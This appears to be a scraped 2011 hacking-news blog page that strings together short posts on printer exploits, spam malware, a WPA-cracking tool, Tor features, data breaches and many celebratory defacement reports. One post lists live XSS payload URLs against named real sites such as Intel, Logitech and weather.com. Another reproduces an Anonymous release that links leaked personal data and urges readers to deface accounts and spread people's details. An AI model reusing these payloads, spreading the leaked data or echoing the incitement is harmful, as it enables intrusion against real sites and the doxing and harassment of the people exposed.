Print of one malicious document can expose your whole LAN

This year at Chaos Communications Congress (28C3) Ang Cui presents Print Me If You Dare, in which he explained how he reverse-engineered the firmware-update process for HPs hundreds of millions of printers and In Andrei Costin’s presentation “Hacking MFPs” he covered the history of printer and copier hacks from the 1960s to today.

Cui discovered that he could load arbitrary software into any printer by embedding it in a malicious document or by connecting to the printer online. As part of his presentation, he performed two demonstrations: in the first, he sent a document to a printer that contained a malicious version of the OS that caused it to copy the documents it printed and post them to an IP address on the Internet; in the second, he took over a remote printer with a malicious document, caused that printer to scan the LAN for vulnerable PCs, compromise a PC, and turn it into a proxy that gave him access through the firewall.

Costin found a method to exploit the firmware update capability of certain Xerox MFPs to upload his crafted PostScript code. He was able to run code to dump memory from the printer. This could allow an attacker to grab passwords for the administration interface or access or print PIN-protected documents.

MFPs are trusted devices connected to the office network, but sometimes they’re also accessible from the Internet. The numbers of publicly accessible office MFPs range in the tens of thousands. An attacker could craft PostScript code tied with exploits from the Metasploit framework and upload it to an MFP to attack a corporate network.

Cui’s technique for infecting printers involves the more limited Printer Job Language, rather than PostScript, and injects code into processes running on the printer. This was effectively a custom rootkit for the printer’s OS. Cui gave HP a month to issue patches for the vulnerabilities he discovered, and HP now has new firmware available that fixes this (his initial disclosure was misreported in the press as making printers vulnerable to being overheated and turning into "flaming death bombs" he showed a lightly singed sheet of paper that represented the closest he could come to this claim). He urges anyone with an HP printer to apply the latest patch, because malware could be crafted to take over your printer and then falsely report that it has accepted the patch while discarding it.

The vulnerability was disclosed to HP, and updates for infected printers were released last week.

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

Technology Development Board (Indian Govt. Website) Hacked By XtReMiSt

A hacker " XtReMiSt" from hacker group Muslim Liberation Army hacked the official website of Technology Development Board(Indian Government site).  Previously, he hacked thousand of popular and important sites including Bathinda Police Official Website, Baran Police, Jalgaon Janta Bank, Crime Investigation Department (CID) West Bengal.

Hacked site:

http://www.tdb.gov.in/

Mirror:

http://www.zone-h.com/mirror/id/16487992

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

50+ websites Hacked By Pak Cyber Combat Squad (PCCS)

A Pakistan Hacker group "Pak Cyber Combat Squad (PCCS) " hacked more than 50 sites and defaced them.

Few hacked sites:

http://obapaslanmaz.com.tr/
http://noskturkiye.com/
http://narlicpl.k12.tr/
http://bezirgankoyu.com/
http://beykoztrakyalilar.com/
http://bestelhobi.com/
http://bestelmodelarabalar.com/
http://gayegencadam.com/
http://www.beselmobilya.com/

You can check the full list here:
http://pastebin.com/A4WhfJ16

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

Amazon Shipping Confirmation emails leads to Malware infection

A series of fake 'Shipping Confirmation" emails purporting to be from Amazon.com have been hitting inboxes around the world. The messages supposedly provide recipients with shipping and order information about a recent purchase of expensive items such as mobile phones or computer equipment. The emails invite recipients to click links, ostensibly to track their package, manage orders or arrange for the return of the shipped item.

The emails are designed to panic users into clicking links in the mistaken belief that their Amazon account or credit card has been compromised.

Those who fall for the ruse and click one of the links will be taken not to Amazon.com as they expect, but rather to a website that harbours a BlackHole Exploit Kit. This criminal tool kit is used to infect the hapless visitor's computer with malware by exploiting security flaws present on the targeted PC. This particular attack attempts to infect the visitor's computer with a version of the Cridex malware that can steal personal and financial information from the infected computer, connect to a remote server and download further malware components.

Subject lines and other details, including the item supposedly purchased, vary in different incarnations of the malware message. Be cautious of any unsolicited email claiming to be a shipping notification from Amazon. If you receive such an email do not follow any links that it may contain.

Spam Mail:

Subject: Your Amazon.com order of "Sprint HTC Evo 4g Android Cell Phone" has shipped! Hello,

Shipping Confirmation
Order # 422-7649490-9680520

Your estimated delivery date is:
Tuesday, December 30, 2011

Track your package Thank you for shopping with us. We thought you'd like to know that we shipped this portion of your order separately to give you quicker service. You won't be charged any extra shipping fees, and the remainder of your order will follow as soon as those items become available. If you need to return an item from this shipment or manage other orders, please visit Your Orders on Amazon.com.

Shipment Details
Sprint HTC Evo 4g Android Cell Phone $189.95
Item Subtotal: $189.95
Shipping & Handling: $0.00
Total Before Tax: $189.95
Shipment Total: $189.95
Paid by Visa: $189.95

You have only been charged for the items sent in this shipment. Per our policy, you only pay for items when we ship them to you.

Returns are easy. Visit our .
If you need further assistance with your order, please visit Customer Service.

We hope to see you again soon!
Amazon.com

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

Reaver: Cracks WPA in 10 hours, WPA attack tool released by TNS

Just a day after security researcher Stefan Viehbock released details of vulnerabilities in the WiFi Protected Setup (WPS) protocol that allows attackers to recover WPA/WPA2 passphrases in a matter of hour, a security firm "Tactical Network Solutions" has published an open-source tool capable of exploiting the vulnerability.

Reaver is WPS attack tool ,capable of breaking WPS pins and recovering the plain text WPA/WPA2 passphrase of the target access point in approximately 4-10 hours (attack time varies based on the access point).

There are two offerings of the Reaver tool. The free open source version, which has limited functionality and a commercial version which is user friendly and feature-rich

Download it from here:
http://code.google.com/p/reaver-wps/downloads/list

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

Kuwait Government will suspend Twitter accounts of Anonymous Users

In Kuwait, the Ministry of Interior is in the process of enforcing a rule of their own on Twitter which prevents Kuwaiti users from using anonymous accounts. The ministry said in a press statement that such measure comes in order to preserve the rights of citizens and residents of people who were used to slander them and their families under fake names, saying that such is a crime punishable by law.

The statement went on to say that the move was meant to protect the rights of citizens and residents who have found themselves the subject of slander through statements made by these anonymous accounts, a crime punishable by law in the country, as it is in the UAE.

It confirmed that all public have the freedom of expression guaranteed to them by the Constitution as long as those practices are going according to the law, especially with regard to using the Twitter site.

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

Spam Mail "I'm in trouble!" Redirecting to Malware Sites

MX Lab intercept a spam mail with the subject “Fwd: I’m in trouble!” that leads to malware infection.

The Spam Mail:

I was at a party, got drunk, couldn’t drive the car, somebody gave me a lift on my car, and crossed on the red light!
I’ve just got the pictures, maybe you know him???

Here is the photo

I need to find him urgently!
Thank you
Asmita
Fingerprint: c72d5b3c-af1af1a5

The hacker trick users by providing some fake Fingerprint so that it will look real one.

The link "Here is the photo" leads to a malware site.  The URL can be identified quite easily because they are fairly long, will point to servers where blogs are hosted and quite often have what appears random characters and variables inside.

If you get these type of emails, stay away from the link and delete the mail. Don't try to reply or follow the link, it will harm your system.

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

BJPKarnataka Hacked by THA [The Hackers Army]

BJP [Bharatiya Janta Party] Hacked by THA ~!
Website Hacked :- http://bjpkarnataka.org/
Mirror :- http://zonehmirrors.net/defaced/2011/12/23/bjpkarnataka.org/

Check out More Defaces by THA Hackers Army

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

Picture Password Introduced by Microsoft for Windows 8

The experience of signing in to your PC with touch has traditionally been a cumbersome one. In a world with increasingly strict password requirements—with numbers, symbols, and capitalization—it can take upwards of 30 seconds to enter a long, complex password on a touch keyboard. To get rid of all these stuffs Microsoft is introducing a new technology. Using that you can login ti your Windows 8 PC with a picture password. Likely designed for touchscreens, users are prompted with a familiar picture of their choice and asked to make a series of finger gestures on the screen to setup password protection. Microsoft recommends that users pick at least three gestures and can choose between a circle, a tap and a line drawn between two points. When a user logs into a Windows 8 machine using Picture Password, they simply have to replicate the correct placement, order and direction of all gestures.

Microsoft dictates the set of three different gestures after research showed that login time was cut from 17 seconds using free form gestures to 4 seconds using preset gestures. Users don’t have to be 100 percent accurate with the placement of the gestures as the image is broken up into a grid and the combination of replicating the three gestures is assigned a percentage score each time the login process is attempted through an algorithm. If the score is 90 percent or above, the user gains access to the system. Microsoft also outlined how security is increased with the Picture Password method. For instance, if a user creates a six-character text password with at least one uppercase letter and one number, there would be 7 billion combinations available. However, if a user creates a picture password with six gestures using only taps, that number increases to 1.3 trillion combinations. Even further, reducing the amount of gestures to five and including at least one circle and one line gesture within the group increases the number of combinations to approximately 70 trillion. The Windows engineering team has just started building the Picture Password functionality and hopes to include it within the final version of Windows 8 likely released during 2012.

You can find more information about this article on the Windows 8 Developer Blog 

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

Israeli Server Rooted, Hundreds of Domains Hacked By The Hackers Army

Another big blow by recently formed hackers group named The Hackers Army. Earlier this group has made their own reputation on the cyber world by hacking into the hacktivist Anonymous website, Official Site of President of Guyana and many more high profile sites. This time they rooted a Israeli Server and hacked all the domains hosted on that particular server. To know the hacked sites click here.

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

Mochahost Web Server Rooted, More Than 1250 Sites Hacked By Teamgreyhat

Few days earlier well known hackers group Teamgreyhat has rooted the Guyana Server and thus they hacked more than 1500 websites. Now TGH strikes again, this time another big attack happens. Mochahost Web hosting company's server compromised and more than 1250 websites get hacked by TGH hackers. After this attack TGH authority claimed them selves as the "Achilles of Cyber World". To emphasizes this statement they changed the background music of the hacked page and used the famous quotes of well-known movie Troy. If you dig the history you will find that TGH has already made their own identity on the web by hacking many web servers such as Theexpert Server, Malaysian Web-host, Cybertek Web-Server, 5gbfree.com, Guyana Server and many more. Again this attack proves the strength of TGH. All the hacked sites can be found on a pastebin written by Teamgreyhat. 

Press Release of TGH:- 

"Guyana Server Rooted, 1500 Websites Hacked By Teamgreyhat
T-Series Official Website Hacked By Teamgreyhat (TGH)
Theexpert Server Rooted By TGH
Malaysian Web-Hosting Company's Security Compromised, Entire Server Dumped By TeamGreyhat
Cybertek Web-Server Rooted By TGH 
& & & Many more..............
Yet moooooooooooore to Come.................


The Common question arise and that is who is TGH and what we are capable of???
Here is the Answer


We are TGH 
We are Warriors 
We are Achilles of Cyber World
............
"Remember, I will still be here
As long as you hold me, in your memory


Remember, when your dreams have ended
Time can be transcended 
Just remember me


I am the one star that keeps burning, so brightly,
It is the last light, to fade into the rising sun


I'm with you
Whenever you tell, my story
For I am all I've done


Remember, I will still be here
As long as you hold me, in your memory
Remember me


I am that one voice in the cold wind, that whispers
And if you listen, you'll hear me call across the sky


As long as I still can reach out, and touch you
Then I will never die


Remember, I'll never leave you
If you will only
Remember me


Remember me...


Remember, I will still be here
As long as you hold me
In your memory


Remember, when your dreams have ended
Time can be transcended
I live forever 
Remember me


Remember me
Remember... me..."

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

Hackers infected the Amnesty International’s UK site with Malware

Researchers @ Barracuda Labs reported Amnesty International’s UK website(hxxp://www[.]amnesty[.]org[.]uk) has been compromised and is serving drive-by downloads. From the research the site was compromised on or before Friday, December 16.

The site loads hxxp://3max[.]com[.]br/cgi-bin/ai/ai.html via an iframe. "3max.com.br" is a legitimate but compromised Brazilian automotive website, loads malicious Java content (stolen from the Metasploit project), which targets CVE-2011-3544. If the exploit is successful, malware is installed on the visitor’s system.

The experts say that the attack on the human rights group may be an attempt to spy on activists.

"The exploit payload possesses properties of targeted malware but is being served by an exploit of a popular, public website. The working theory for this anomaly relates to Amnesty International as a human rights non-governmental organization. To explain, certain countries use zero day exploits and other techniques to gain electronic information about the activities of human rights activists. Of course, a subset of these activists are too smart to click on links in even well-worded spearphishing emails. But what if you compromised a website frequented by these activists (e.g., Amnesty International)? Then your targets come to you. The context-specific damage potential is significant." said in the post.

Details of Vulnerability Targeted by the Exploit
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544

VirusTotal Detections for Exploit
http://www.virustotal.com/file-scan/report.html?id=1cc214cee10f02d37359c0e3d04fd57899333c4b1eaa81489c74e5c2fa17c3a8-1324068153

VirusTotal Detections for Exploit Payload
http://www.virustotal.com/file-scan/report.html?id=0e53832e1c36d34a3d05c05f73ebab22a74ade95c5f3b7d9f74fad4f56d10023-1324067892

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

Hackers compromised 38 million Chinese users data by hacking Game sites

Yesterday, One of the Biggest Chinese Network of Software developers "Chinese Software Developer Network" (CSDN) hacked and 6 million users info leaked. Following that instant,  A recent news report from Sina Tech says, there are other sites also get hacked.

Duowan, a games site, was hacked and hackers stole the data of its over eight million users. 7K7K, also a gaming site, reportedly lost data for 20 million users, and hackers also got info from 10 million accounts by hacking 178.com, another game site.

Rumors are spreading that the hacks and leaked data may also have affected major social networking sites like Renren (NYSE:RENN) and Kaixin, but those claims appear to be unsubstantiated .

Up to now, have been a lot more than play games of user data to be published on the Internet. However, these rumors have not been officially confirmed.

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

40+ Dutch & 11 Educational Sites Hacked By Hitcher

Dangerous Pakistani hacker from Pak Cyber Force named Hitcher strikes again. If you dig the decent past you will find that Hitcher has hacked lost of high profile sites including Wipro Limited, Quadrant Televentures Ltd. (Aka HFCL Infotel) Media Centre, Fin Bank of Nigeria Hacked By Hitcher (Database), Cambridge Communications Limited, Progate Group Corporation, Geological Society Of India and many more. This time he hacked and defaced more than 50 websites, among them there are 40+ Dutch sites, 11 Educational sites. The list of hacked sites can be found on a pastebin release. 

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

750+ Websites Hacked By Minhal & NoTty_raj

Minhal & NoTty_raj two well known Indian hacker strikes again. This time more than 750 websites get hacked.  They released a pastebin containing the list of all hacked sites and mirrors. Earlier Minhal has hacked thousands of sites, databases and so on. Among them Mit.edu Database Hacking, Private information leak of NASA researchers, Harvard Computer Society site hacking and many more.  

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

80+ Websites Hacked by aKfortyseven

80+ Websites got Hacked by aKfortyseven from CODE104 ! [League of assassins]

You can Check the list of Websites here :- http://pastebin.com/mGzM899m

He Told that some more websites gonna be defaced in coming days  !

Some famous websites defaced :- 123freshers.com
hyperwebenable.info
and many more you can check all of them in the link given above !

Mirror of a Websites :- http://zone-hack.com/defacements/?id=23799
Check out more mirror of defacements here:-
http://zone-hack.com/hacker/?user=aKfortyseven

Message by Defacer :-

JAI HIND !! I AM FROM INDIA

 Your SEC. SUXX

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

News Section Of Pakistan Attacked By Indishell

Attack On News Section Of Pakistan And Many more sites got hacked as a payback to pakistani hackers defaces in indian sites 

From Last weak daily Indian sites were getting hacked by hackers group PCA and 

THA (the hackers army) ~ a new group of pakistani lamer name Disaster 

This group is famous for there random hacking on lame sites from worlwide 

The group THA indicates there hack as a reason for Kashmir lolzz They thinks indian gov. will give kashmir to pakistan from defacing 

Two hackers from the Best Indian Hackers group Indishell hacked down 70+ pakistani sites under there code name (Ashell and Irfninja) in which most of the sites are of pakistani news section The list begins with Livepakistan.com with 10000 rank in pakistan and ending with official urdu news blog urdublog.com 

Hackers share the Pastebin for the list of domains 

and share there msg with world as :

JAI HIND

MIRRORS 

NAME: INDISHELL

AT ZONE-H (http://zone-h.com/)

AT LEGEND-H (http://legend-h.org)

AT ZONE-HACK (http://zone-hack.com)

HACKED BY INDISHELL

ASHELL AND IRFNINJA

INDISHELL ALWAYS HACK AS A PAYBACK AND THATS WHAT WE DID 

THIS IS IN RESPONSE TO LULZ SITES HACKED BY THA AND PCA

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

Avast Hacked by Hmei7

Do you like this story?

Famous Anti Virus Provider Avast Got Hacked, Avast website's .se Domain Defaced by a indonesian 
Hacker Hmei7

avst got hcked 

Hacked website : http://www.avast.se
Mirror : http://zone-h.net/mirror/id/16244562

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

Nimbuzz's Russian Website Hacked

 Biggest Chat Portal Nimbuzz 's Russia  website IMBUZZ.ORG
Hacked by a Iranian Hacker LVLR.HACK


website : IMBUZZ.ORG


Mirror : http://zone-hc.com/archive/mirror/d9876e0_imbuzz.org.html

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

Guyana Server Rooted, 1500 Websites Hacked By Teamgreyhat

Dangerous hackers group Teamgreyhat strikes again. This time an Indian server rooted by TGH and more than 1500 websites get hacked. Few days ago TGH hacked the official of site T-Series. After that this is another big attack of Teamgreyhat. Earlier TGh has rooted many web-servers among them Theexpert Server, Malaysian Web-host, Cybertek Web-Server, 5gbfree.com and many more. Yesterday the President of the Republic of Macedonia website was hacked by KHS, behind that attack TGH plays the most significant role. Teamgreyhat has released a pastebin containing all the hacked sites and deface mirrors. 

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

50+ South African Websites Hacked By JingoBD (BCA)

JingoBD a hacker from Bangladesh Cyber Army (BCA) has hacked more than 50 South African websites. Earlier lost of hackers from BCA has hacked many websites. Among them R3x0man, Shadman Tanjim, Rudr0, a1um1n1um has hacked many important sites like Govt., Hackers Forum, Web-hosting Re-seller provider and many more. One of the remarkable job done by BCA was that Shadman Tanjim  found SQL Injection Vulnerability In Google Lab Database System. That vulnerability report on Google lab has a huge significance in the security domain. JingoBD has created a pastebin which contains the list of hacked sites and deface mirrors. 

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

President of the Republic of Macedonia Hacked By Kosova Hackers Security (KHS)

Official website of President of the Republic of Macedonia get hacked by Th3 Dir3ctory, Theta.Nu & X-Crepo from Kosova Hackers Security (KHS). The hackers have created a deface mirror on Arabzone. Earlier these hacker group has hacked thousands valuable of websites among them one of their biggest blow was Hotmail server hacking. What ever this attack of KHS on the Govt. of Macedonia again proves their strength.

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

15+ Websites Defaced by aKfortyseven incl. Logitech, Bluetooth, NIssan, Intel, NOD32, Rediff

Some famous websites got defaced by indian hacker aKfortyseven from League of Assassins [Code104]
Message by aKfortyseven :- 

Please Kindly Mute your Speakers if you are at home !

Here are the Details :-

Website:-http://www.iphotoscrap.com
Defaced Page:-http://www.iphotoscrap.com/search.php?q=<script>window.location="http://pastehtml.com/view/bhstbojpk.html";</script>


Website:-http://www.medworm.com
Defaced Page:-http://www.medworm.com/rss/search.php?qu=%3Cscript%3Ewindow.location=%22http://pastehtml.com/view/bhstbojpk.html%22;%3C/script%3E


Website:-http://www.goldsborobooks.com
Defaced Page:-http://www.goldsborobooks.com/search.php?q=<script>window.location="http://pastehtml.com/view/bhstbojpk.html";</script>

Website:-http://www.laureus.com
Defaced Page:-http://www.laureus.com/search?search="><script>window.location="http://pastehtml.com/view/bhstbojpk.html";</script>

Website:-http://www.mysterytwisterc3.org
Defaced Page:-http://www.mysterytwisterc3.org/?lang="><script>window.location="http://pastehtml.com/view/bhstbojpk.html";</script>

Website:-http://www.spele.nl
Defaced Page:-http://www.spele.nl/search/?q="><script>window.location="http://pastehtml.com/view/bhstbojpk.html";</script>

Website:-http://www.vkbanen.nl
Defaced Page:-http://www.vkbanen.nl/lijst_banen/banen_in_jouw_regio.jsp?zoek=zoek&fullTextSearch="><script>window.location="http://pastehtml.com/view/bhstbojpk.html";</script>

Website:-http://www.nod32.se
Defaced Page:-http://www.nod32.se/t_product_view.php?product_id="><script>window.location="http://pastehtml.com/view/bhstbojpk.html";</script>

Website:-http://www.weather.com/
Defaced Page:-http://www.weather.com/info/sitesearch?q=/"><script>window.location="http://pastehtml.com/view/bhstbojpk.html";</script>

Website:-http://www.toyota.com.ve/
Defaced Page:-http://www.toyota.com.ve/dealers/index.asp?formid=1&searchvalue="><script>window.location="http://pastehtml.com/view/bhstbojpk.html";</script>

Website:-http://ilsearch.rediff.com
Defaced Page:-http://ilsearch.rediff.com/ilsearch/default.asp?MT=/"><script>window.location="http://pastehtml.com/view/bhstbojpk.html";</script>&MTEng=Xss&prefilldata=[[/"><script>window.location="http://pastehtml.com/view/bhstbojpk.html";</script>]]&language=hindi


Website:-https://premier.intel.com/
Defaced Page:-https://premier.intel.com/scripts-quad/error.asp?err_msg=<script>window.location="http://pastehtml.com/view/bhstbojpk.html";</script>


Website:-http://www.nissan.com.sg/
Defaced Page:-http://www.nissan.com.sg/contactus/contactus.cfm?error=<script>window.location="http://pastehtml.com/view/bhstbojpk.html";</script>&type=1


Website:-https://www.bluetooth.org/
Defaced Page:-https://www.bluetooth.org/apps/content/Banner.aspx?banner_id="><script>window.location="http://pastehtml.com/view/bhstbojpk.html";</script>


Website:-http://www.logitech.com/
Defaced Page:-http://www.logitech.com/en-za/support-downloads?modelsearch=yes&modelNumber="/><script>window.location="http://pastehtml.com/view/bhstbojpk.html";</script>


Website:-http://ncbolabs-dev1.stanford.edu
Defaced Page:-http://ncbolabs-dev1.stanford.edu:8080/parsetrees/execute.jsp?query="><script>window.location="http://pastehtml.com/view/bhstbojpk.html";</script>&type=string

 Attack TYPE :- XSS

Attacker :- aKfortyseven

Country :- India

Greetz to::- Cyber ace & All Indian Hackers

 Check out more defacements by aKfortyseven HERE

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

Geological Survey of Pakistan Govt. & Some Valuable Pak Sites Hacked By Indishell

Indishell (The Indian Cyber Army) hit the Pakistan Cyber Fence. This time ten Pakistani websites get hacked and defaced by Indishell. Most of the websites have high profile valuation. The hacked site list start with the official website of Geological Survey of Pakistan (Govt. of Pakistan), GOGO Pakistan (9000 Rank in Pakistan), daily top 15 (14000 rank in pakistan and 3 lack rank worldwide), Pak Sky, 5 Pakistani business sites and many more. List of all the hacked sites are available on a pastebin release. 

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

Tor 0.2.3.9-alpha Released With Initial IPv6 Support

Tor 0.2.3.9-alpha introduces initial IPv6 support for bridges, adds a "DisableNetwork" security feature that bundles can use to avoid touching the network until bridges are configured, moves forward on the pluggable transport design, fixes a flaw in the hidden service design that unnecessarily prevented clients with wrong clocks from reaching hidden services, and fixes a wide variety of other issues.

Features:-  

• Clients can now connect to private bridges over IPv6. Bridges still need at least one IPv4 address in order to connect to other relays. Note that we don't yet handle the case where the user has two bridge lines for the same bridge (one IPv4, one IPv6). Implements parts of proposal 186.

• New "DisableNetwork" config option to prevent Tor from launching any connections or accepting any connections except on a control port.

• Bundles and controllers can set this option before letting Tor talk to the rest of the network, for example to prevent any connections to a non-bridge address. Packages like Orbot can also use this   option to instruct Tor to save power when the network is off.

• Clients and bridges can now be configured to use a separate "transport" proxy. This approach makes the censorship arms race easier by allowing bridges to use protocol obfuscation plugins.  It implements the "managed proxy" part of proposal 180 (ticket 3472).

• When using OpenSSL 1.0.0 or later, use OpenSSL's counter mode implementation. It makes AES_CTR about 7% faster than our old one (which was about 10% faster than the one OpenSSL used to provide). Resolves ticket 4526.

•  Add a "tor2web mode" for clients that want to connect to hidden services non-anonymously (and possibly more quickly). As a safety measure to try to keep users from turning this on without knowing what they are doing, tor2web mode must be explicitly enabled at compile time, and a copy of Tor compiled to run in tor2web mode cannot be used as a normal Tor client. Implements feature 2553.

•  Add experimental support for running on Windows with IOCP and no kernel-space socket buffers. This feature is controlled by a new "UserspaceIOCPBuffers" config option (off by default), which has no effect unless Tor has been built with support for bufferevents, is running on Windows, and has enabled IOCP. This may, in the long run, help solve or mitigate bug 98.

•  Use a more secure consensus parameter voting algorithm. Now at least three directory authorities or a majority of them must vote on a given parameter before it will be included in the consensus. Implements proposal 178.

Major Bugfixes:-

• Hidden services now ignore the timestamps on INTRODUCE2 cells.
• They used to check that the timestamp was within 30 minutes of their system clock, so they could cap the size of their  replay-detection cache, but that approach unnecessarily refused service to clients with wrong clocks. Bugfix on 0.2.1.6-alpha, when the v3 intro-point protocol (the first one which sent a timestamp field in the INTRODUCE2 cell) was introduced; fixes bug 3460.
• Only use the EVP interface when AES acceleration is enabled, to avoid a 5-7% performance regression. Resolves issue 4525; bugfix on 0.2.3.8-alpha.

Privacy/Anonymity Features (bridge detection):-

• Make bridge SSL certificates a bit more stealthy by using random serial numbers, in the same fashion as OpenSSL when generating self-signed certificates. Implements ticket 4584.
• Introduce a new config option "DynamicDHGroups", enabled by default, which provides each bridge with a unique prime DH modulus to be used during SSL handshakes. This option attempts to help against censors who might use the Apache DH modulus as a static identifier for bridges. Addresses ticket 4548.

To Download Tor 0.2.3.9-alpha Click Here

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

Representative Customs, Excise & Service Tax Appellate Tribunal (Govt. of India) Hacked By Pakistani Hacker

One week earlier KhantastiC haX0r has hacked and defaced the official website of Indian Congress and defaced the Profile of Sonia Gandhi. Now the target is Official website of Joint Chief Departmental Representative Customs, Excise & Service Tax Appellate Tribunal, Ahmedabad  (Govt. of India). Two dangerous Pakistani hacker named KhantastiC haX0r & Shadow008 has hacked and defaced the site. They also created the deface mirror on Zone-h.

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

220+ Indian Websites Hacked By The Hackers Army

Well known Pakistani hacker group The Hackers Army strikes again. Earlier this week this one hacker named Tha Disastar from The Hackers Army has hacked the Official Site of President of Guyana.  Not only that but also hacktivist Anonymous website Anonyops.com was also get hacked and defaced by The Hackers Army. They sent the website offline for more than 24 hrs. What ever this time more than two hundred websites get hacked. Most of them are Indian sites. The list of hacked sites can be found on a pastebin release.

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

Linkedin,IndiaStudyChannel vulnerable to Persistent XSS(Cross site Scripting)

A Hacker found XSS vulnerability in linkedin ,indiastudychannel and two other websites. Unfortunately, it is persistent XSS. Attacker can use this vulnerability and launch any malicious attack on users.

http://events.linkedin.com/scriptalerthiscript-37029
http://www.indiastudychannel.com/member/qwerty123.aspx
http://www.i-neighbours.org/index.php?zipcode=19046&hoodId=awsome
http://old.nabble.com/adding-%24%28%22%3Cscript%3E%22%29-node-actually-runs-the-script---correct-behavior--td23608124s27240.html

He reported about the vulnerability to those websites.

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

clearusa.org ,Password & email addresses, phone numbers Leaked By Anonymous

Relese By anonymous : 



Greetings, lulzlovers around the world.


The American law enforcement's inhumane treatments of occupiers has caught our attention. You have shown through these actions that you are nothing more than puppets in the hands of your government. We have seen our fellow brothers & sisters being teargassed for exercising their fundamental liberal rights, the exact ones that were bestowed upon them by their Constitution. Due to this and several other reasons we are releasing the entire member database of clearusa.org (The Coalition of Law Enforcement and Retail). An organization who works to "encourage mutual cooperation between all law enforcement agencies and retail corporations". This fun little database dump includes hashed passwords, physical and email addresses, phone numbers etc. of many military, law enforcement officers, large corporations such as Microsoft, federal agents & security companies. Many of the users reuse their passwords elsewhere, so we encourage all of our lulz loving friends to deface & leak their twitters, facebooks and private email accounts as well as spreading their d0xes far and wide across the internet ocean. The website requires new members to be approved by an administrator, meaning the validity of this information is relatively high.


### PASSWORDS, EMAIL ADDRESSES, PHYSICAL ADDRESSES, PHONE NUMBERS ETC ###


Pastehtml Link: http://pastehtml.com/view/bgz9c5zk8.html
Backup Link: http://speedy.sh/t8tAn/clearusa-member-completex1.html




################ FORUM PMS #################


Link: http://pastehtml.com/view/bgz9jo1s8.html




We are Anti-Security
We do not forgive police brutality
We do not forget our brothers suffering
We will avenge.
You should have expected us.


Remember - We are always inside your rootdir.


Brought to you by your friendly lulz loving pirate - Exphin1ty (@exphin1ty on twitter)


see full details : http://pastebin.com/HkP55NWC

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

20+ websites Hacked By Devilzsec Hacking Crew

pleasereview.it, netoprofessionals.com & Other Major websites By Hayate from Devilzsec Hacking Crew
some websites patched Immediately but you can see deface page in thier mirror

http://www.netoprofessionals.com/ 
http://zone-m.co.cc/defacements/?id=5045 


http://www.pahealthcareinsurance.com/ 
http://zone-m.co.cc/defacements/?id=5046 


http://www.parrellioptical.com/ 
http://zone-m.co.cc/defacements/?id=5047 


http://www.pleasereview.it/ 
http://zone-m.co.cc/defacements/?id=5048 


http://www.pohlyco.com/ 
http://zone-m.co.cc/defacements/?id=5049 


http://www.ranksfirst.com/ 
http://zone-m.co.cc/defacements/?id=5052 


http://www.richardsongreen.com/ 
http://zone-m.co.cc/defacements/?id=5054 


http://www.selfstoragecumberland.com/ 
http://zone-m.co.cc/defacements/?id=5055 


http://www.sigmanlaw.us/ 
http://zone-m.co.cc/defacements/?id=5057 


http://www.staymad.com/ 
http://zone-m.co.cc/defacements/?id=5061 


http://www.stubblebinecompany.com/ 
http://zone-m.co.cc/defacements/?id=5063 


http://www.teamjungle.com/ 
http://zone-m.co.cc/defacements/?id=5066 


http://www.theolawoffice.com/ 
http://zone-m.co.cc/defacements/?id=5068 


http://www.thorpecorp.com/ 
http://zone-m.co.cc/defacements/?id=5070 


http://www.thorpeinternational.com/ 
http://zone-m.co.cc/defacements/?id=5074 


http://www.thorpeproducts.com/ 
http://zone-m.co.cc/defacements/?id=5075 
http://www.tophdaddy.com/ 
http://zone-m.co.cc/defacements/?id=5076 


http://www.wellporthealth.com/ 
http://zone-m.co.cc/defacements/?id=5077 


http://www.yourreviewfor.us/ 
http://zone-m.co.cc/defacements/?id=5078 


http://www.yourtells.com/ 
http://zone-m.co.cc/defacements/?id=5079 


http://www.greenbananaseo.com/ 
http://zone-m.co.cc/defacements/?id=5080

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

1.8 Million Accounts Hacked from Square Enix Japanese Game Company

Square Enix stated yesterday that somebody "may have gained unauthorized access to a particular Square Enix server" and took its members service offline in both Japan and the U.S. Today, the company clarified that 1.8 million customer's accounts had been affected.

The company said it noticed that unknown parties had accessed the server for its free "Square Enix Members" site on Tuesday afternoon, and decided to shut down the service the same day. Users register on the server with their email addresses and sometimes their names, addresses and phone numbers, but the server holds no credit card information, a spokesman said.

The intruder breached an unknown number of servers that could hold data for the service's one million members in Japan and 800,000 members in North America, but left untouched the servers with its 300,000 European members. In May, Square Enix said it suffered hacking attacks into the web site of a Canadian subsidiary and two product sites. It said 350 applicants' resumes and up to 25,000 email addresses were stolen in that attack.

Get Free Updates: *Please click on the confirmation link sent in your Spam folder of Email*

Key infrastructure systems of 3 US cities Under Attack By Hackers

